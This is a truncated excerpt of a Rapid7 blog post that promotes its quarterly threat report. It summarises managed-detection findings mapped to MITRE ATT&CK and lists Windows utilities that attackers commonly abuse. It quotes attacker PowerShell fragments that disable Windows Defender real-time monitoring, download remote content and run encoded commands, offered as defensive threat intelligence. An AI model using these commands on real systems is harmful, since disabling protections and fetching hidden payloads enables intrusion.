We’ve got something exciting in store for you in this quarter’s Rapid7 Quarterly Threat Report: the MITRE ATT&CK™ framework!
That’s right, we’ve spent the last couple quarters aligning our data sources with the ATT&CK framework in hopes of gaining more insight into attacker activities and impact to the organizations we cover in the report … and IT WORKED!
Here are a few key findings that came out of our analysis:
Our MDR team is WAY above the industry average, with the majority of threats identified and remediated in under one day from detection.
The majority of detections occur in the “Execution” phase on the MITRE ATT&CK™ framework.
Within the “Execution” tactic, we see attackers using a ton of PowerShell and third-party software techniques.
We also decided to go deeper than before into the data from Rapid7’s Managed Detection and Response (MDR) team and perform analysis on that PowerShell and Windows utility usage by attackers. We uncovered some interesting trends in switch usage for malicious use of PowerShell, including:
“Set-MpPreference -DisableRealtimeMonitoring $true” to disable Windows protections.
“Net.WebClient” and “DownloadString” to fetch additional content.
“-EncodedCommand” to bypass real-time monitoring software and evade detection.
For the Windows utilities, below are the top 15 command line utilities used by attackers in the third quarter:
Executable
Description
cmd.exe
The Windows command line interpreter. Attackers use this to interact with the entire operating system.
powershell.exe
The Windows scripting language interpreter. Attackers use this utility to run scripts.
ADExplorer.exe
A SysInternals (now Microsoft) tool that allows you to visually explore Active Directories and their properties
rundll32.exe
The Wi ..
Support the originator by clicking the read the rest link below.
